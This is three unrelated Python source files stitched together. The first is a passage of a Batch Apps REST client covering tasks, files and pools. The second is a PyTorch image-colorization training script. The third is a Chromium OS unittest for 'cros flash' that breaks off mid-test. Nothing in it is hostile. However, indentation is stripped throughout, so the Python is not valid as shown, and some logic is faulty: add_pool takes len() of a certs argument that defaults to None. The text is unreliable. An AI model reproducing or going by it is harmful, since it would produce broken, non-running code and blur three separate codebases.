url = url.format(jobid=job_id, name=fname)
elif not url:
return Response(
False,
RestCallException(
AttributeError,
"Either output url or job id and filename required.",
None))
try:
head_resp = rest_client.head(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
else:
return Response(True, head_resp)
def list_tasks(self, job_id=None, url=None):
"""
List the tasks of a job.
Either ``job_id`` *or* ``url`` must be set. If both are set ``url``
will be used.
:Kwargs:
- job_id (str): ID of the job to list the tasks for.
The default is None.
- url (str): Direct URL to the task list of the job
(supplied by :meth:`.BatchAppsApi.get_job()`)
:Returns:
- A :class:`.Response` object containing the list of task
dictionaries if the call is successful.
- A :class:`.Response` object containing the
:class:`.RestCallException` if the call failed.
"""
self._log.debug("list_tasks, job_id={0}, url={1}".format(job_id, url))
if not url and job_id:
url = self.url("jobs/{jobid}/tasks").format(jobid=job_id)
elif not url and not job_id:
return Response(False,
RestCallException(
AttributeError,
"Either job_id or url must get set",
None))
try:
resp = rest_client.get(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
else:
if 'tasks' not in resp or not isinstance(resp['tasks'], list):
return Response(False,
RestCallException(
KeyError,
"tasks key not in response message",
resp))
return Response(True, resp['tasks'])
def list_task_outputs(self, job_id, task):
"""Lists the output files produced by a task.
:Args:
- job_id (str): The ID of the job the task outputs belong to.
- task (int, str): The ID of the task whose outputs will be listed.
:Returns:
- A list of the outputs represented as dictionaries, each with the
'name' and 'type' of the output as well as a download 'link'.
Contained in a :class:`.Response`. If the call failed,
Response will contain the :class:`.RestCallException`.
"""
self._log.debug("list_task_outputs, job_id={0}, "
"task={1}".format(job_id, task))
url = self.url("jobs/{jobid}/tasks/{taskid}/outputs/files")
url = url.format(jobid=job_id, taskid=task)
try:
resp = rest_client.get(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
outputs = []
if 'outputs' not in resp or not isinstance(resp['outputs'], list):
return Response(False,
RestCallException(
KeyError,
"outputs key not in response message",
resp))
for output in resp['outputs']:
outputs.append({
'name': output.get('name'),
'link': output.get('link', {'href':None}).get('href'),
'type': output.get('kind')
})
return Response(True, outputs)
def cancel_task(self, job_id, task):
"""Cancel a running task of a job in progress.
:Args:
- job_id (str): The ID of the job whose task will be cancelled.
- task (int, str): The ID of the task to be cancelled.
:Returns:
- A :class:`.Response` object with the POST response, however this
is not required if the call is successful. The call will only
be successful if the task can be and is cancelled.
- If the task is not running (and therefore cannot be cancelled),
the call will fail and the :class:`.RestCallException` will be
returned in the :class:`.Response` object.
- Any other communication failures will also return a
:class:`.RestCallException`.
"""
self._log.debug("cancel_task, job_id={0}, task={1}".format(job_id,
task))
url = self.url("jobs/{jobid}/tasks/{taskid}/actions/cancel")
url = url.format(jobid=job_id, taskid=task)
try:
resp = rest_client.post(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
else:
return Response(True, resp)
def list_files(self):
"""
Lists the user's files.
This refers to files uploaded by the user (sometimes referred to as
assets) as distinct from task or job outputs generated during
task processing.
:Returns:
- A :class:`.Response` object containing a list of files as
dictionaries, with data:
``['id','name','lastModifiedBy','lastModifiedTime','link']``
- If the call failed or if the response is incomplete/malformed
a :class:`.Response` object with a :class:`.RestCallException`.
"""
self._log.debug("list_files, no params")
url = self.url("files")
try:
resp = rest_client.get(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
if 'files' not in resp or not isinstance(resp['files'], list):
return Response(False,
RestCallException(
KeyError,
"files key not in response message",
resp))
return Response(True, resp['files'])
def query_files(self, files):
"""
Queries for user files matching specified criteria.
This is used to detect whether a user's files already exist in the cloud
and whether they're up-to-date. Any number of files can be queried in a
single call.
:Args:
- files (list, dict, str): The files to query.
If this is in the form of a single filename, or list of
filenames, the call will query for user files that match
that filename. If this is in the form of a dict, or list of
dicts, the call will query for a more specific match.
Query dict should have the keys ``{'fileName', 'timestamp'}``
and optionally ``{'originalPath'}``.
:Returns:
- If the query was by filename, a :class:`.Response` containing a
list of all the files (as dicts) with that name will be
returned.
- If the query was by specification, a :class:`.Response`
containing a list of all the matching files (as dicts) will
be returned.
- If the call failed, a :class:`.Response` object containing a
:class:`.RestCallException` will be returned.
"""
self._log.debug("query_files, files={0}".format(files))
url = self.url("files/query/{queryby}")
operations = {str:'byname', dict:'byspecification'}
optype = type(files)
if optype == list and len(files) >= 1:
optype = type(files[0])
elif optype == list and len(files) < 1:
return Response(False,
RestCallException(
ValueError,
"File list empty",
ValueError("File list empty")))
else:
files = [files]
if optype not in operations:
error = ("File query can be done with single "
"file name, list of names, or userfile "
"spec dict. Not {t}".format(t=type(files)))
return Response(False, RestCallException(TypeError,
error,
TypeError(error)))
req_type = operations[optype]
self._log.info("Querying files using {0}".format(req_type))
url = url.format(queryby=req_type)
if req_type == 'byspecification':
message = {"Specifications": files}
else:
message = {"Names": files}
self._log.debug("File query url={0}, message={1}".format(url, message))
try:
resp = rest_client.post(self._auth, url, self.headers, message)
except RestCallException as exp:
return Response(False, exp)
if 'files' not in resp or not isinstance(resp['files'], list):
return Response(False,
RestCallException(
KeyError,
"files key not in response message",
resp))
return Response(True, resp['files'])
def query_missing_files(self, files):
"""
Checks whether user files are present in the cloud.
As opposed to :meth:`.query_files()`, this call returns the files that
are **not** present in the cloud.
:Args:
- files (dict, list): Either a file specification dictionary, or a
list of file spec dictionaries.
:Returns:
- A :class:`.Response` object containing a list of the files that
don't yet exist in the cloud. The files are represented as a
dict with only a 'name' key.
- If the call failed, a :class:`.Response` object containing
a :class:`.RestCallException` is returned.
"""
#TODO: Check whether 'FileHash' is supported.
self._log.debug("query_missing_files, files={0}".format(files))
url = self.url("files/query/missing")
if type(files) == dict:
files = [files]
elif not (type(files) == list
and len(files) >= 1
and type(files[0]) == dict):
error = ("File query can be done with single userfile "
"spec dict, or list of userfile spec dicts. "
"Not {t}".format(t=type(files)))
return Response(False, RestCallException(TypeError, error, None))
message = {"Specifications": files}
try:
resp = rest_client.post(self._auth, url, self.headers, message)
except RestCallException as exp:
return Response(False, exp)
if 'files' not in resp or not isinstance(resp['files'], list):
return Response(
False,
RestCallException(KeyError,
"files key not in response message",
resp))
return Response(True, resp['files'])
def get_file(self, userfile, size, download_dir, overwrite=False,
callback=None, block=4096):
"""Gets the content of a file previously uploaded by the user.
:Args:
- userfile (:class:`.UserFile`): The userfile reference for the
file to be downloaded. Could be generated from a
:meth:`.FileManager.list_files()` call or file query.
Must have 'url' attr.
- size (int): Size of the file in bytes to be downloaded
(see :meth:`.props_file()`).
- download_dir (str): The full path to the destination directory.
:Kwargs:
- overwrite (bool): Whether to overwrite a destination file if it
already exists. The default is ``False``.
- callback (func): A function to be called to report download progress.
The function must take three arguments: the percent downloaded (float), the
bytes downloaded (float), and the total bytes to be downloaded (float).
- block (int): The amount of data downloaded in each block - determines
the frequency with which the callback is called. Default is 4096.
:Returns:
- :class:`.Response` with the GET response, however this is not
required if the call was successful.
- :class:`.Response` with :class:`.RestCallException` if the
download failed.
"""
if not isinstance(userfile, UserFile):
return Response(False, RestCallException(TypeError,
"Not a valid UserFile",
None))
self._log.debug("get_file, file={0}, size={1}, "
"download_dir={2}, overwrite={3}, block={4}".format(userfile,
size,
download_dir,
overwrite,
block))
url = userfile.url
self._log.debug("Get file url: {0}".format(url))
try:
get_resp = rest_client.download(self._auth,
url,
self.headers,
download_dir,
size,
overwrite=overwrite,
block_size=block,
callback=callback)
except RestCallException as exp:
return Response(False, exp)
else:
#TODO: Reconfigure original userfile?
return Response(True, get_resp)
def props_file(self, userfile):
"""Gets the properties of a file previously uploaded by the user.
:Args:
- userfile (:class:`.UserFile`): The userfile reference for the
file to be checked. Could be generated from a
:meth:`.FileManager.list_files()` call or file query.
Must have 'url' attr.
:Returns:
- :class:`.Response` with the requested file size in bytes (int) if
the call was successful.
- :class:`.Response` with :class:`.RestCallException` if the
download failed.
"""
if not isinstance(userfile, UserFile):
return Response(False,
RestCallException(TypeError,
"Not a valid UserFile",
None))
self._log.debug("props_file, file={0}".format(userfile))
url = userfile.url
try:
head_resp = rest_client.head(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
else:
return Response(True, head_resp)
def send_file(self, userfile, callback=None, block=4096):
"""Uploads a user file for use in a job.
:Args:
- userfile (:class:`.UserFile`): The userfile reference for the
file to be uploaded. Must be created from a file that exists
locally.
:Kwargs:
- callback (func): A function to be called to report upload progress.
The function must take three arguments: the percent uploaded (float), the
bytes uploaded (float), and the total bytes to be uploaded (float).
- block (int): The amount of data uploaded in each block - determines
the frequency with which the callback is called. Default is 4096.
:Returns:
- :class:`.Response` with the PUT response, however this is not
required if the call was successful.
- :class:`.Response` with :class:`.RestCallException` if the
upload failed or ``userfile`` was invalid.
"""
#TODO: Get progress feedback working
if not hasattr(userfile, "create_query_specifier"):
return Response(
False,
RestCallException(TypeError,
"Not a valid UserFile",
None))
self._log.debug("send_file, file={0}".format(userfile))
url = self.url("files/{name}")
try:
file_spec = userfile.create_query_specifier()
params = {'timestamp':file_spec['Timestamp'],
'originalFilePath':file_spec['OriginalPath']}
self._log.debug("File description: {0}".format(params))
put_resp = rest_client.put(self._auth,
url,
self.headers,
userfile,
params,
block_size=block,
callback=callback)
except (RestCallException, FileMissingException) as exp:
return Response(False, exp)
else:
return Response(True, put_resp)
def add_pool(self, target_size=0, max_tasks=1, communication=False, certs=None):
"""
Add a new pool.
:Kwargs:
- target_size (int): The target size of the pool. The default is 0.
- max_tasks (int): Max tasks that can run on a single TVM.
The default is 1.
- communication (bool): Indicates whether tasks running on TVMs
in the pool need to be able to communicate directly with each
other. The default is ``False``.
- certs (list): A list of certificates that need to be installed
on the TVMs of the pool. The maximum number of certs that can
be installed on a pool is 10.
:Returns:
- A :class:`.Response` object containing a dict with the new pool id and
a link to the newly created pool.
``{'id': '', 'link': ''}``
- If the call failed or if the response is incomplete/malformed
a :class:`.Response` object with a :class:`.RestCallException`.
"""
self._log.debug("add_pool")
url = self.url("pools")
if len(certs) > 10:
certs = certs[0:10]
try:
message = {
'targetDedicated': str(int(target_size)),
'maxTasksPerTVM': str(int(max_tasks)),
'communication': bool(communication),
'certificateReferences': list(certs)}
except ValueError as exp:
return Response(
False,
RestCallException(ValueError, str(exp), exp))
try:
resp = rest_client.post(self._auth, url, self.headers, message)
except RestCallException as exp:
return Response(False, exp)
if utils.valid_keys(resp, ['poolId', 'link']):
return Response(True, resp)
return Response(
False,
RestCallException(KeyError,
"incorrectly formatted pool response",
resp))
def resize_pool(self, pool_id, target_size):
"""
Resize an existing pool.
:Args:
- pool_id (str): The ID of the pool to be resized.
- target_size (int): The new size of the pool.
:Returns:
- :class:`.Response` with the POST response, however this is not
required if the call was successful.
- If the call failed a :class:`.Response` object with a
:class:`.RestCallException`.
"""
self._log.debug("resize_pool, pool_id={0}, "
"target_size={1}".format(pool_id, target_size))
url = self.url("pools/{poolid}/actions/resize")
url = url.format(poolid=pool_id)
message = {'targetDedicated': str(target_size)}
try:
resp = rest_client.post(self._auth, url, self.headers, message)
except RestCallException as exp:
return Response(False, exp)
return Response(True, resp)
def get_pool(self, pool_id=None, url=None):
"""
Gets information about a pool.
Pool info can be retrieved by supplying **either** the pool's ID
**or** a URL to the pool. If both are supplied, URL is used.
:Kwargs:
- pool_id (str): ID of the pool on which info is requested.
- url (str): A complete URL to the pool info.
:Returns:
- A :class:`.Response` object containing the pool details as a
dictionary, if successful. Otherwise the Response will
contain the :exc:`.RestCallException`.
- :class:`.RestCallException` if neither pool ID nor URL is
supplied.
- :class:`.RestCallException` if pool details dictionary is
malformed / missing necessary keys
"""
self._log.debug("get_pool, pool_id={0}, url={1}".format(pool_id, url))
if not url and pool_id:
url = self.url("pools/{poolid}").format(poolid=pool_id)
elif not url and not pool_id:
return Response(
False,
RestCallException(AttributeError,
"Either pool_id or url must be set",
None))
try:
get_resp = rest_client.get(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
else:
return Response(True, get_resp)
def list_pools(self):
"""Lists the users pools.
:Returns:
- :class:`.Response` object containing success of call. If
successful, the ``Response.result`` will contain a list of
pool dictionaries. If failed, ``Response.result`` will
hold the :exc:`.RestCallException`.
"""
self._log.debug("list_pools, no params")
url = self.url("pools")
try:
get_resp = rest_client.get(self._auth, url,
self.headers)
except RestCallException as exp:
return Response(False, exp)
else:
return Response(True, get_resp)
def delete_pool(self, pool_id):
"""
Delete an existing pool.
:Args:
- pool_id (str): The ID of the pool to be deleted.
:Returns:
- :class:`.Response` with the POST response, however this is not
required if the call was successful.
- If the call failed a :class:`.Response` object with a
:class:`.RestCallException`.
"""
self._log.debug("delete_pool, no params")
url = self.url("pools/{poolid}")
url = url.format(poolid=pool_id)
try:
resp = rest_client.delete(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
return Response(True, resp)
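# A minimal usage sketch (illustrative only; assumes Credentials and
# Configuration instances have already been created as described in their
# respective modules):
#
#   api = BatchAppsApi(credentials, config)
#   listing = api.list_jobs(per_call=25, name="render")
#   if listing.success:
#       for job in listing.result['jobs']:
#           print(job['id'], job['name'])
#   else:
#       raise listing.result  # a RestCallException describing the failure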
|
# For plotting
import numpy as np
import matplotlib.pyplot as plt
#%matplotlib inline
# For conversion
from skimage.color import lab2rgb, rgb2lab, rgb2gray
from skimage import io
# For everything
import torch
import torch.nn as nn
import torch.nn.functional as F
# For our model
import torchvision.models as models
from torchvision import datasets, transforms
# For utilities
import os, shutil, time
# Check if GPU is available
use_gpu = torch.cuda.is_available()
def validate(val_loader, model, criterion, save_images, epoch):
model.eval()
# Prepare value counters and timers
batch_time, data_time, losses = AverageMeter(), AverageMeter(), AverageMeter()
end = time.time()
already_saved_images = False
for i, (input_gray, input_ab, target) in enumerate(val_loader):
data_time.update(time.time() - end)
# Use GPU
if use_gpu: input_gray, input_ab, target = input_gray.cuda(), input_ab.cuda(), target.cuda()
# Run model and record loss
output_ab = model(input_gray) # predict ab channels
loss = criterion(output_ab, input_ab)
losses.update(loss.item(), input_gray.size(0))
# Save images to file
if save_images and not already_saved_images:
already_saved_images = True
for j in range(min(len(output_ab), 10)): # save at most 10 images
save_path = {'grayscale': 'outputs/gray/', 'colorized': 'outputs/color/'}
save_name = 'img-{}-epoch-{}.png'.format(i * val_loader.batch_size + j, epoch)
to_rgb(input_gray[j].cpu(), ab_input=output_ab[j].detach().cpu(), save_path=save_path, save_name=save_name)
# Record time to do forward passes and save images
batch_time.update(time.time() - end)
end = time.time()
# Print model accuracy -- in the code below, val refers to both value and validation
if i % 25 == 0:
print('Validate: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'.format(
i, len(val_loader), batch_time=batch_time, loss=losses))
print('Finished validation.')
return losses.avg
def train(train_loader, model, criterion, optimizer, epoch):
print('Starting training epoch {}'.format(epoch))
model.train()
# Prepare value counters and timers
batch_time, data_time, losses = AverageMeter(), AverageMeter(), AverageMeter()
end = time.time()
for i, (input_gray, input_ab, target) in enumerate(train_loader):
# Use GPU if available
if use_gpu: input_gray, input_ab, target = input_gray.cuda(), input_ab.cuda(), target.cuda()
# Record time to load data (above)
data_time.update(time.time() - end)
# Run forward pass
output_ab = model(input_gray)
loss = criterion(output_ab, input_ab)
losses.update(loss.item(), input_gray.size(0))
# Compute gradient and optimize
optimizer.zero_grad()
loss.backward()
optimizer.step()
# Record time to do forward and backward passes
batch_time.update(time.time() - end)
end = time.time()
# Print model accuracy -- in the code below, val refers to value, not validation
if i % 25 == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'.format(
epoch, i, len(train_loader), batch_time=batch_time,
data_time=data_time, loss=losses))
print('Finished training epoch {}'.format(epoch))
class AverageMeter(object):
'''A handy class from the PyTorch ImageNet tutorial'''
def __init__(self):
self.reset()
def reset(self):
self.val, self.avg, self.sum, self.count = 0, 0, 0, 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def to_rgb(grayscale_input, ab_input, save_path=None, save_name=None):
'''Show/save rgb image from grayscale and ab channels
Input save_path in the form {'grayscale': '/path/', 'colorized': '/path/'}'''
plt.clf() # clear matplotlib
color_image = torch.cat((grayscale_input, ab_input), 0).numpy() # combine channels
color_image = color_image.transpose((1, 2, 0)) # CHW -> HWC for lab2rgb / matplotlib
color_image[:, :, 0:1] = color_image[:, :, 0:1] * 100
color_image[:, :, 1:3] = color_image[:, :, 1:3] * 255 - 128
color_image = lab2rgb(color_image.astype(np.float64))
grayscale_input = grayscale_input.squeeze().numpy()
if save_path is not None and save_name is not None:
print(grayscale_input.shape)
print(color_image.shape)
plt.imsave(arr=grayscale_input, fname='{}{}'.format(save_path['grayscale'], save_name), cmap='gray')
plt.imsave(arr=color_image, fname='{}{}'.format(save_path['colorized'], save_name))
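# Scaling note: GrayscaleImageFolder below maps CIELAB values (L in [0, 100],
# a/b roughly in [-128, 127]) into [0, 1] via (lab + 128) / 255, so the inverse
# above restores the predicted ab channels with * 255 - 128 and stretches the
# [0, 1] grayscale network input to [0, 100] to stand in for L before lab2rgb.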
class GrayscaleImageFolder(datasets.ImageFolder):
'''Custom images folder, which converts images to grayscale before loading'''
def __getitem__(self, index):
path, target = self.imgs[index]
img = self.loader(path)
if self.transform is not None:
img_original = self.transform(img)
img_original = np.asarray(img_original)
img_lab = rgb2lab(img_original)
img_lab = (img_lab + 128) / 255
img_ab = img_lab[:, :, 1:3]
img_ab = torch.from_numpy(img_ab.transpose((2, 0, 1))).float()
img_original = rgb2gray(img_original)
img_original = torch.from_numpy(img_original).unsqueeze(0).float()
if self.target_transform is not None:
target = self.target_transform(target)
return img_original, img_ab, target
class ColorizationNet(nn.Module):
def __init__(self, input_size=128):
super(ColorizationNet, self).__init__()
MIDLEVEL_FEATURE_SIZE = 128
## First half: ResNet
resnet = models.resnet18(num_classes=365)
# Change first conv layer to accept single-channel (grayscale) input
resnet.conv1.weight = nn.Parameter(resnet.conv1.weight.sum(dim=1).unsqueeze(1))
# Extract midlevel features from ResNet-gray
self.midlevel_resnet = nn.Sequential(*list(resnet.children())[0:6])
## Second half: Upsampling
self.upsample = nn.Sequential(
nn.Conv2d(MIDLEVEL_FEATURE_SIZE, 128, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(128),
nn.ReLU(),
nn.Upsample(scale_factor=2),
nn.Conv2d(128, 64, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.Upsample(scale_factor=2),
nn.Conv2d(64, 32, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(32),
nn.ReLU(),
nn.Conv2d(32, 2, kernel_size=3, stride=1, padding=1),
nn.Upsample(scale_factor=2)
)
def forward(self, input):
# Pass input through ResNet-gray to extract features
midlevel_features = self.midlevel_resnet(input)
# Upsample to get colors
output = self.upsample(midlevel_features)
return output
model = ColorizationNet()
criterion = nn.MSELoss()
optimizer = torch.optim.Adam(model.parameters(), lr=1e-2, weight_decay=0.0)
train_transforms = transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomHorizontalFlip()])
train_imagefolder = GrayscaleImageFolder(r'C:\Users\liyun\PycharmProjects\Colorization\images\train', train_transforms)
train_loader = torch.utils.data.DataLoader(train_imagefolder, batch_size=16, shuffle=True)
# Validation
val_transforms = transforms.Compose([transforms.Resize(256), transforms.CenterCrop(224)])
val_imagefolder = GrayscaleImageFolder(r'C:\Users\liyun\PycharmProjects\Colorization\images\val' , val_transforms)
val_loader = torch.utils.data.DataLoader(val_imagefolder, batch_size=16, shuffle=False)
if use_gpu:
criterion = criterion.cuda()
model = model.cuda()
os.makedirs(r'C:\Users\liyun\PycharmProjects\Colorization\outputs\color', exist_ok=True)
os.makedirs(r'C:\Users\liyun\PycharmProjects\Colorization\outputs\gray', exist_ok=True)
os.makedirs(r'C:\Users\liyun\PycharmProjects\Colorization\checkpoints', exist_ok=True)
save_images = True
best_losses = 1e10
epochs = 100
# Train model
for epoch in range(epochs):
# Train for one epoch, then validate
train(train_loader, model, criterion, optimizer, epoch)
with torch.no_grad():
losses = validate(val_loader, model, criterion, save_images, epoch)
# Save checkpoint and replace old best model if current model is better
if losses < best_losses:
best_losses = losses
torch.save(model.state_dict(), 'checkpoints/model-epoch-{}-losses-{:.3f}.pth'.format(epoch+1,losses))
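# Path note: to_rgb() and torch.save() above write to the relative paths
# 'outputs/...' and 'checkpoints/', which resolve against the current working
# directory, while the os.makedirs() calls create absolute directories under
# the project folder; the script therefore assumes it is launched from
# C:\Users\liyun\PycharmProjects\Colorization so the two locations coincide.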
|
#!/usr/bin/python
# Copyright (c) 2013 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This module tests the cros flash command."""
import mock
import os
import sys
sys.path.insert(0, os.path.abspath('%s/../../..' % os.path.dirname(__file__)))
from chromite.cros.commands import cros_flash
from chromite.cros.commands import init_unittest
from chromite.lib import cros_build_lib
from chromite.lib import cros_test_lib
from chromite.lib import dev_server_wrapper
from chromite.lib import partial_mock
from chromite.lib import remote_access
# pylint: disable=W0212
class TestXbuddyHelpers(cros_test_lib.MockTempDirTestCase):
"""Test xbuddy helper functions."""
def testGenerateXbuddyRequestForUpdate(self):
"""Test we generate correct xbuddy requests."""
# Use the latest build when 'latest' is given.
req = 'xbuddy/latest?for_update=true&return_dir=true'
self.assertEqual(
cros_flash.GenerateXbuddyRequest('latest', 'update'), req)
# Convert the path starting with 'xbuddy://' to 'xbuddy/'
path = 'xbuddy://remote/stumpy/version'
req = 'xbuddy/remote/stumpy/version?for_update=true&return_dir=true'
self.assertEqual(cros_flash.GenerateXbuddyRequest(path, 'update'), req)
def testGenerateXbuddyRequestForImage(self):
"""Tests that we generate correct requests to get images."""
image_path = 'foo/bar/taco'
self.assertEqual(cros_flash.GenerateXbuddyRequest(image_path, 'image'),
'xbuddy/foo/bar/taco?return_dir=true')
image_path = 'xbuddy://foo/bar/taco'
self.assertEqual(cros_flash.GenerateXbuddyRequest(image_path, 'image'),
'xbuddy/foo/bar/taco?return_dir=true')
def testGenerateXbuddyRequestForTranslate(self):
"""Tests that we generate correct requests for translation."""
image_path = 'foo/bar/taco'
self.assertEqual(cros_flash.GenerateXbuddyRequest(image_path, 'translate'),
'xbuddy_translate/foo/bar/taco')
image_path = 'xbuddy://foo/bar/taco'
self.assertEqual(cros_flash.GenerateXbuddyRequest(image_path, 'translate'),
'xbuddy_translate/foo/bar/taco')
def testConvertTranslatedPath(self):
"""Tests that we convert a translated path to a usable xbuddy path."""
path = 'remote/latest-canary'
translated_path = 'taco-release/R36-5761.0.0/chromiumos_test_image.bin'
self.assertEqual(cros_flash.ConvertTranslatedPath(path, translated_path),
'remote/taco-release/R36-5761.0.0/test')
path = 'latest'
translated_path = 'taco/R36-5600.0.0/chromiumos_image.bin'
self.assertEqual(cros_flash.ConvertTranslatedPath(path, translated_path),
'local/taco/R36-5600.0.0/dev')
@mock.patch('chromite.lib.cros_build_lib.IsInsideChroot', return_value=True)
def testDevserverURLToLocalPath(self, _mock1):
"""Tests that we convert a devserver URL to a local path correctly."""
url = 'http://localhost:8080/static/peppy-release/R33-5116.87.0'
base_path = os.path.join(self.tempdir, 'peppy-release/R33-5116.87.0')
local_path = os.path.join(base_path, 'recovery_image.bin')
self.assertEqual(
cros_flash.DevserverURLToLocalPath(
url, self.tempdir, 'recovery'), local_path)
# Default to test image.
local_path = os.path.join(base_path, 'chromiumos_test_image.bin')
self.assertEqual(
cros_flash.DevserverURLToLocalPath(url, self.tempdir, 'taco'), local_path)
class MockFlashCommand(init_unittest.MockCommand):
"""Mock out the flash command."""
TARGET = 'chromite.cros.commands.cros_flash.FlashCommand'
TARGET_CLASS = cros_flash.FlashCommand
COMMAND = 'flash'
def __init__(self, *args, **kwargs):
init_unittest.MockCommand.__init__(self, *args, **kwargs)
def Run(self, inst):
init_unittest.MockCommand.Run(self, inst)
class RemoteDeviceUpdaterMock(partial_mock.PartialCmdMock):
"""Mock out RemoteDeviceUpdater."""
TARGET = 'chromite.cros.commands.cros_flash.RemoteDeviceUpdater'
ATTRS = ('UpdateStateful', 'UpdateRootfs', 'GetUpdatePayloads',
'SetupRootfsUpdate', 'Verify')
def __init__(self):
partial_mock.PartialCmdMock.__init__(self)
def GetUpdatePayloads(self, _inst, *_args, **_kwargs):
"""Mock out GetUpdatePayloads."""
def UpdateStateful(self, _inst, *_args, **_kwargs):
"""Mock out UpdateStateful."""
def UpdateRootfs(self, _inst, *_args, **_kwargs):
"""Mock out UpdateRootfs."""
def SetupRootfsUpdate(self, _inst, *_args, **_kwargs):
"""Mock out SetupRootfsUpdate."""
def Verify(self, _inst, *_args, **_kwargs):
"""Mock out SetupRootfsUpdate."""
class UpdateRunThroughTest(cros_test_lib.MockTempDirTestCase,
cros_test_lib.LoggingTestCase):
"""Test the flow of FlashCommand.run with the update methods mocked out."""
IMAGE = '/path/to/image'
DEVICE = '1.1.1.1'
def SetupCommandMock(self, cmd_args):
"""Setup comand mock."""
self.cmd_mock = MockFlashCommand(
cmd_args, base_args=['--cache-dir', self.tempdir])
self.StartPatcher(self.cmd_mock)
def setUp(self):
"""Patches objects."""
self.cmd_mock = None
self.updater_mock = self.StartPatcher(RemoteDeviceUpdaterMock())
self.PatchObject(cros_flash, 'GenerateXbuddyRequest',
return_value='xbuddy/local/latest')
self.PatchObject(dev_server_wrapper, 'DevServerWrapper')
self.PatchObject(cros_flash, 'TranslateImagePath',
return_value='taco-paladin/R36/chromiumos_test_image.bin')
self.PatchObject(remote_access, 'CHECK_INTERVAL', new=0)
self.PatchObject(remote_access.ChromiumOSDevice, '_LearnBoard',
return_value='peppy')
def testUpdateAll(self):
"""Tests that update methods are called correctly."""
self.SetupCommandMock([self.DEVICE, self.IMAGE])
with mock.patch('os.path.exists', return_value=True) as _m:
self.cmd_mock.inst.Run()
self.assertTrue(self.updater_mock.patched['UpdateStateful'].called)
self.assertTrue(self.updater_mock.patched['UpdateRootfs'].called)
def testUpdateStateful(self):
"""Tests that update methods are called correctly."""
self.SetupCommandMock(['--no-rootfs-update', self.DEVICE, self.IMAGE])
with mock.patch('os.path.exists', return_value=True) as _m:
self.cmd_mock.inst.Run()
self.assertTrue(self.updater_mock.patched['UpdateStateful'].called)
self.assertFalse(self.updater_mock.patched['UpdateRootfs'].called)
def testUpdateRootfs(self):
"""Tests that update methods are called correctly."""
self.SetupCommandMock(['--no-stateful-update', self.DEVICE, self.IMAGE])
with mock.patch('os.path.exists', return_value=True) as _m:
self.cmd_mock.inst.Run()
self.assertFalse(self.updater_mock.patched['UpdateStateful'].called)
self.assertTrue(self.updater_mock.patched['UpdateRootfs'].called)
def testMissingPayloads(self):
"""Tests we exit when payloads are missing."""
self.SetupCommandMock([self.DEVICE, self.IMAGE])
with mock.patch('os.path.exists', return_value=False) as _m1:
self.assertRaises(cros_build_lib.DieSystemExit, self.cmd_mock.inst.Run)
class USBImagerMock(partial_mock.PartialCmdMock):
"""Mock out USBImager."""
TARGET = 'chromite.cros.commands.cros_flash.USBImager'
ATTRS = ('GetImagePathFromDevserver', 'CopyImageToDevice',
'ChooseRemovableDevice', 'ListAllRemovableDevices',
'GetRemovableDeviceDescription')
def __init__(self):
partial_mock.PartialCmdMock.__init__(self)
def GetImagePathFromDevserver(self, _inst, *_args, **_kwargs):
"""Mock out GetImagePathFromDevserver."""
def CopyImageToDevice(self, _inst, *_args, **_kwargs):
"""Mock out CopyImageToDevice."""
def ChooseRemovableDevice(self, _inst, *_args, **_kwargs):
"""Mock out ChooseRemovableDevice."""
def ListAllRemovableDevices(self, _inst, *_args, **_kwargs):
"""Mock out ListAllRemovableDevices."""
return ['foo', 'taco', 'milk']
def GetRemovableDeviceDescription(self, _inst, *_args, **_kwargs):
"""Mock out GetRemovableDeviceDescription."""
class ImagingRunThroughTest(cros_test_lib.MockTempDirTestCase,
cros_test_lib.LoggingTestCase):
"""Test the flow of FlashCommand.run with the imaging methods mocked out."""
IMAGE = '/path/to/image'
def SetupCommandMock(self, cmd_args):
"""Setup comand mock."""
self.cmd_mock = MockFlashCommand(
cmd_args, base_args=['--cache-dir', self.tempdir])
self.StartPatcher(self.cmd_mock)
def setUp(self):
"""Patches objects."""
self.cmd_mock = None
self.imager_mock = self.StartPatcher(USBImagerMock())
self.PatchObject(cros_flash, 'GenerateXbuddyRequest',
return_value='xbuddy/local/latest')
self.PatchObject(dev_server_wrapper, 'DevServerWrapper')
self.PatchObject(cros_flash, 'TranslateImagePath',
return_value='taco-paladin/R36/chromiumos_test_image.bin')
self.PatchObject(os.path, 'exists', return_value=True)
def testLocalImagePath(self):
"""Tests that imaging methods are called correctly."""
self.SetupCommandMock(['usb:///dev/foo', self.IMAGE])
with mock.patch('os.path.isfile', return_value=True) as _m:
self.cmd_mock.inst.Run()
self.assertTrue(self.imager_mock.patched['CopyImageToDevice'].called)
def testNonLocalImagePath(self):
"""Tests that we try to get the image path from devserver."""
self.SetupCommandMock(['usb:///dev/foo', self.IMAGE])
with mock.patch('os.path.isfile', return_value=False) as _m1:
with mock.patch('os.path.isdir', return_value=False) as _m2:
self.cmd_mock.inst.Run()
self.assertTrue(
self.imager_mock.patched['GetImagePathFromDevserver'].called)
self.assertTrue(self.imager_mock.patched['CopyImageToDevice'].called)
def testConfirmNonRemovableDevice(self):
"""Tests that we ask user to confirm if the device is not removable."""
with mock.patch.object(cros_build_lib, 'BooleanPrompt') as mock_prompt:
